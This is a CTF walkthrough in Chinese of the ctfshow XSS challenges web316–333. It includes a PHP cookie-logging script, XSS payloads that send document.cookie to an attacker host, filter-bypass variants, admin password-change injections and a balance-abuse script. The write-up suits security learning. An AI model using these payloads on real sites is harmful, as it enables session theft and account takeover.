可能写的有点啰嗦,记录自己做题的过程

文章目录

  • web316
  • web317
  • web318
  • web319
  • web320
  • web321
  • web322
  • web323
  • web324
  • web325
  • web326
  • web327
  • web328
  • web329
  • web330
  • web331
  • web332
  • web333

web316

后台会每隔一段时间(一般为15秒)去访问一次我们的链接(毕竟要领10个鸡蛋bot要康康你的分享状态),当BOT访问我们的xss的时候我们就能拿到admin的cookie。

这里有两种方法来获取,一种是在线的xss平台,如https://xsshs.cn/,https://xss.pt/,http://xsscom.com去生成xss链接

另一种就是搭建在自己的网站上,写一段php代码即可,如

# xss.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

一般来说,第一种方法已经够我们用了,但是有的时候还是只能用第二种方法。如ctfshow 终极考核题,因为第二台机器不能出网无法做到代理,而第二台机器又存在XSS,这种时候就只能使用第二种方法来获得cookie了。

这里使用https://xss.pt/xss.php,首先注册登录进入主页,然后点击创建

选择默认模块

获得很多种链接,随便用一个来生成“祝福语”,生成后再刷新一下题目,然后回到项目界面

当然会出现一种很常见的情况是:you are not admin no flag

不要慌张,这种情况是正常的(就是X到自己了),多弄几次就好了

太伤心了,整了十几次都还是插的自己

玛德我无语了,我放自己服务器上去,放上去(上面的php代码)之后写这条语句

<script>document.location.href="http://ip/xss.php?cookie="+document.cookie</script>

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

为啥一次成功了,我不理解。。

web317

上一题的payload打不通,因为过滤了但不知道过滤了什么,将script换成body就成功了,说明过滤了script

<body οnlοad="window.location.href='http://ip/xss.php?cookie='+document.cookie"></body>

web318

上一道题的payload成功了

web319

上一题的payload成功了

web320

上一题的payload失败了,不知道过滤了啥。这里测试一下。

第一次测试是删掉了href前面的

这说明过滤点在前面,body是没问题的

第二次删掉window前面的,一样有回显,说明过滤点在前面

onload没问题,body没问题,说明问题出在这个空格

绕过方法:

TAB

/

/**/

<body/**/οnlοad="window.location.href='http://ip/xss.php?cookie='+document.cookie"></body>

web321

上一道题payload成功了

web322

玛德太恶心了,这里需要把服务器上的xss.php改成别的名字,总之不能出现xss三个字符

<body/**/οnlοad="window.location.href='http://ip/a.php?cookie='+document.cookie"></body>

web323

上一题payload成功了

web324

上一题payload成功了

web325

上一题payload成功了

web326

上一题payload成功了

web327

换题了,存储型XSS

收件人肯定admin

然后信的内容用322payload试一下

成功

web328

一个登录的,账号admin,密码上面的payload试试

失败了,账号密码都用payload试试

还是失败了

诶上面有个注册按钮,试一下。

无法注册admin,换别的名字就可以。登录进去用户管理只有admin才能看到

因为只有管理员才能看到用户管理,那这里有个思路就是说能不能注入payload到用户管理那里,那个管理员访问。

注册一个账号,密码为上面的payload试试

实践结果是不行

这里用<script>试试,要注意的是最后要加个分号

<script>window.location.href='http://ip/a.php?cookie='+document.cookie;</script>

这里得到了管理员的cookie,那直接用cookie登录试一下

但是抓包这里看不到管理的界面,而且这是临时的,所以直接换存储

然后刷新一下界面就看到了flag,但是flag一闪而过了,这里就只有抓包了

web329

方法同上,能得到cookie但是还是访问不了页面

原因是,管理员访问了页面就退出了,相当于现在得到的最新cookie是管理员上一次用的cookie

这里不行了呀这里,看了下wp是用js

这样,看视频https://www.bilibili.com/video/BV1gi4y1A76p

<script>$('.laytable-cell-1-0-1').each(function(index,value){if(value.innerHTML.indexOf('ctf'+'show')>-1){window.location.href='http://ip/a.php?cookie='+value.innerHTML; }
});</script>

这里拆开是因为如果直接写ctfshow,到时候查询到的第一条含有ctfshow的就是我们自己

加个{,ctf+show{

记得每次数据被污染了就开一个新的靶场

web330

多了个修改密码的选项,那不直接让admin自己修改自己密码

<script>window.location.href='http://127.0.0.1/api/change.php?p=admin';</script>

注册一个payload账号就行了

web331

思路和上一道一样,只不过方法从get变成了post

<script>$.ajax({url:'api/change.php',type:'post',data:{p:'2333'}});</script>

web332

9999元才能购买flag,新注册账号有5块钱。

然后发现转负的钱自己就能加,别就会减,哈哈哈哈

给admin转个-9999就好了

web333

上一道题就想写脚本了,结果发现了简单方法所以没写

这里直接写个脚本疯狂注册给我钱(薅羊毛)

写了二十多分钟一直调试发现就是登录不上。。。不知道为啥呜呜呜

看了下yu师傅的脚本,是自己给自己转钱,就可以加,我太笨了

import requests
x=5
url="http://e8e0aa13-bff2-4b78-a8cb-f7c0f0e73ae2.challenge.ctf.show/api/amount.php"
url2="http://e8e0aa13-bff2-4b78-a8cb-f7c0f0e73ae2.challenge.ctf.show/api/getFlag.php"
headers={'Cookie':'PHPSESSID=jkvcavn3fpfel2opl4afqdcepp'}  #自己登录后的sessionid
while True:print(x)t=x-1data={'u':'mumuzi', #注册的用户名'a':str(t)}r=requests.post(url,headers=headers,data=data)print(r.text)if(x>10000):r2=requests.get(url2,headers=headers)print(r2.text)breakx+=t

至此,XSS部分结束

ctfshow XSS web316-web333 wp相关推荐

  1. ctfshow XSS web316~web333

    web316 反射性 XSS 题目提示我们要以 admin 获取 奇葩的是用网上的 xss 平台,获取的 cookie 全是自己的. 可以在自己的服务器上,创建一个接收 cookie 的 PHP 文件 ...

  2. ctfshow XSS漏洞web316-328

    XSS漏洞 漏洞简介: XSS(Cross Site Scripting)意为跨站脚本攻击.为了不与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写 ...

  3. CTFShow“萌心区”WP(上)

    CTFShow "萌心区"WP详解(上) 萌新认证 萌新_密码1 萌新_密码2 萌新_密码3 萌新_密码4 隐写1 隐写2 萌新_隐写2 萌新_隐写3 萌新_隐写4 萌新_隐写5 ...

  4. ctfshow—2023愚人杯wp

    ctfshow-2023愚人杯wp 热身 热身 100 愚人杯比赛秉承欢乐.有爱.进取的精神 在群里师傅热心帮助下,已经开始第三届比赛啦! 欢迎各位师傅参加,希望大家玩的开心,比赛题目可以自由讨论.但 ...

  5. [WP/CTFshow]XSS Web316-333

    CTFSHOW WP 题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS 316.需要配套接收端XSS脚本 如果未过滤script且对外部资源加载无限制的情况下,可以指定src为 ...

  6. [CTFSHOW]XSS入门(佛系记录)

    文章目录 前言 web316 web317-319 前面某些题梭哈 web320 web321 web322-324过滤了; web325过滤了. 前面那个String.fromCharCode生产p ...

  7. ctfshow XSS

    收集一下可用的姿势吧, window.open:open() 方法用于打开一个新的浏览器窗口或查找一个已命名的窗口. location.href="/url" 当前页面打开URL页 ...

  8. CTFshow 击剑杯 部分WP

    摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc 中文识别带师 2.Web 简单的验证码 easyPOP 3.Pwn pwn0 ...

  9. ctfshow sql注入 web171-web253 wp

    文章目录 参考文章 sql注入 web171 web172 web173 web174 web175 解法一 解法二 web176 web177 web178 web179 web180-web182 ...

最新文章

  1. ajax百分比加载特效,jQuery实现的简单百分比进度条效果示例
  2. WPF下可编辑Header的Tab控件实现
  3. firefox ie table 布局 兼容性问题
  4. 15个Java多线程面试题
  5. ShardingSphere RAW JDBC 分布式事务 Narayana XA 代码示例
  6. markdown中快速插入Emoji表情包语法速查表!!!
  7. 无法复制_desktop:访问被拒绝的解决方法
  8. 【Python机器学习及实践】笔记
  9. 人工智能白皮书 附下载地址
  10. TopCoder 2019线下比赛
  11. Andriod获取本机ip地址
  12. 【数据库】表与视图的基础操作
  13. 这四款Windows上的高质量软件,装机必备,使用起来极度舒适
  14. Vue脚手架、镜像源下载及使用
  15. 详解java人力外包的费用组成
  16. JavaWeb搭建简易个人博客
  17. Extmail修改模板
  18. 网络调试工具TCP/UDP socket的使用
  19. 海康威视新手上路:MFC连接球机
  20. IHE测试系列之二:报名及参与过程

热门文章

  1. 怎么去禁止QQ的安全组件,来解决QQ和360的冲突问题
  2. i节点(inode)和文件描述符(file descriptor)的区别和联系
  3. 怎样给音乐变速变调调音?不妨试试这些变声变调方法
  4. 不属于php语言的,PHP和Java都不属于脚本语言。()
  5. SQL server-数据库修改与删除
  6. Vue keyframe动画不生效
  7. JDBC(oracle11g)
  8. python下载安装教程-python安装教程
  9. 堆和栈的区别以及特点
  10. 牛客练习赛51 C:勾股定理(勾股数)